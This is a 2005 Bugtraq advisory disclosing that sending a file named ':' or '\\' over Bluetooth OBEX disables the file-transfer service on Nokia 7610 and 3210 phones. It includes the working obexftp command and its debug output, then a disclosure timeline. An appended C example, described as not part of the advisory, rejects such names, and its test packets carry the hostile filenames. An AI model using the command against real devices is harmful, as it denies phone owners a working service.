Bugtraq mailing list archives


Nokia 7610, 3210 denial of service in OBEX.


From: "A. Ramos" <aramosf () unsec net>
Date: Mon, 26 Sep 2005 19:58:53 +0200

Title: Nokia 7610, 3210 Denial of Service in OBEX.
Severity: Low
Affected: tested on Nokia 7610 and Nokia 3210 (maybe other Symbian phones).
Problem type: remote

Details:
----------------------------------------------------------------------

There are some flaws in the OBEX implementation in the Nokia 7610
(V4.0.43715-09-04 RH51), and others, that disable this service if you send
an archive with the name ":" or "\".

---- Quote of IROBEX12.pdf, page 40, section 4.3 -- (OBEX specification)
"Pushing objects into the inbox
Objects are pushed into the inbox by using the PUT command with a Name
header. The string in the Name header should not contain any path
characters such as ‘:’, ‘/’ or ‘\’. Objects with improperly formed names
should be rejected."
----

The device asks for a PIN if you are not paired, or asks if you want to
accept a connection from the remote box; you need to ACCEPT. It has low
risk, because it doesn't work if you don't accept the incoming connection.

If the connection is established, the file is sent and there isn't a "New
message arrived" message, like when you send a correct archive. It's OK,
the filename is dropped.

The problem is that the OBEX service doesn't work anymore after this: if
you try to send another file, or some vCard from another device, you can't
connect to the remote OBEX service again.

Demonstration with Linux as client:

jim:~# hcitool scan
Scanning ...
        00:13:70:5E:1F:01       7610
jim:~# obexftp -b 00:13:70:5E:1F:01 -p \:
Browsing 00:13:70:5E:1F:01 ...
Channel: 10
No custom transport
obexftp_cli_open()
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT 1
cli_sync_request()
obexftp_sync()
client_done()
client_done() Found connection number: -1022384746
client_done() Sender identified
obexftp_sync() OBEX_HandleInput = 31
obexftp_sync() Done success=1
done
Sending ":"... 
obexftp_put_file() Sending : -> :
build_object_from_file() Lastmod = 2005-09-18T00:16:42Z
cli_sync_request()
cli_fillstream_from_file()
cli_fillstream_from_file() Read 6 bytes
cli_fillstream_from_file()
cli_fillstream_from_file() Read 0 bytes
obexftp_sync()
obexftp_sync() OBEX_HandleInput = 0
failed: :
obexftp_cli_disconnect()
Disconnecting...cli_sync_request()
failed: disconnect
obexftp_cli_close()

# Error pushing other file after send ":" filename:
jim:~# obexftp -b 00:13:70:5E:1F:01 -p /etc/hosts
Browsing 00:13:70:5E:1F:01 ...
Channel: 10
No custom transport
obexftp_cli_open()
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect

----------------------------------------------------------------------

Timeline:
20 Sept 2005: bug found.
21 Sept 2005: Nokia security contacted.
24 Sept 2005: Disclosure in NCN - V congress (http://www.noconname.org).
26 Sept 2005: Full disclosure.

--
A. Ramos.
mailto: <aramosf () unsec net>
http://www.unsec.net
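
The rejection rule quoted from section 4.3 of the OBEX specification, written out as a receiver-side check. This is an added example, not code from the advisory or from Nokia. The function name, verdict enum and sample packets are constructed for illustration, and rejecting empty names and embedded NULs is an assumption beyond the quoted text.

```c
#include <stdint.h>
#include <stdio.h>

enum name_verdict { NAME_OK, NAME_REJECT, NAME_ABSENT, PKT_MALFORMED };
/* Vet the Name header (HI 0x01, UTF-16BE, null-terminated) of one OBEX PUT packet. */
enum name_verdict check_put_name(const uint8_t *p, size_t n)
{
    if (n < 3 || (p[0] & 0x7F) != 0x02) return PKT_MALFORMED;  /* not a PUT */
    size_t total = ((size_t)p[1] << 8) | p[2], off = 3, hlen;
    if (total < 3 || total > n) return PKT_MALFORMED;
    while (off < total) {
        uint8_t hi = p[off];
        if ((hi >> 6) == 2) hlen = 2;              /* header with 1-byte value */
        else if ((hi >> 6) == 3) hlen = 5;         /* header with 4-byte value */
        else {                                     /* text or bytes: 2-byte length */
            if (total - off < 3) return PKT_MALFORMED;
            hlen = ((size_t)p[off + 1] << 8) | p[off + 2];
            if (hlen < 3) return PKT_MALFORMED;
        }
        if (hlen > total - off) return PKT_MALFORMED;
        if (hi == 0x01) {
            const uint8_t *s = p + off + 3;
            size_t body = hlen - 3;
            /* Assumption: an inbox push needs a non-empty, terminated name. */
            if (body < 4 || body % 2 || s[body - 2] || s[body - 1]) return NAME_REJECT;
            for (size_t i = 0; i + 2 < body; i += 2) {
                unsigned c = ((unsigned)s[i] << 8) | s[i + 1];
                /* Path characters from the quoted spec text; NUL is an added check. */
                if (c == ':' || c == '/' || c == '\\' || c == 0) return NAME_REJECT;
            }
            return NAME_OK;
        }
        off += hlen;
    }
    return NAME_ABSENT;
}

/* Constructed sample packets: Length header (0xC3), then Name header. */
static const uint8_t PKT_COLON[]  = {0x82,0,0x0F, 0xC3,0,0,0,6, 0x01,0,0x07, 0,':',  0,0};
static const uint8_t PKT_BSLASH[] = {0x82,0,0x0F, 0xC3,0,0,0,6, 0x01,0,0x07, 0,'\\', 0,0};
static const uint8_t PKT_HOSTS[]  = {0x82,0,0x17, 0xC3,0,0,0,6, 0x01,0,0x0F,
                                     0,'h',0,'o',0,'s',0,'t',0,'s', 0,0};

int main(void) {
    printf("%d %d %d\n", check_put_name(PKT_COLON, sizeof PKT_COLON),
           check_put_name(PKT_BSLASH, sizeof PKT_BSLASH),
           check_put_name(PKT_HOSTS, sizeof PKT_HOSTS));
    return 0;
}
```

A receiver that gets NAME_REJECT or PKT_MALFORMED should refuse the object and keep the OBEX service listening for the next connection.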
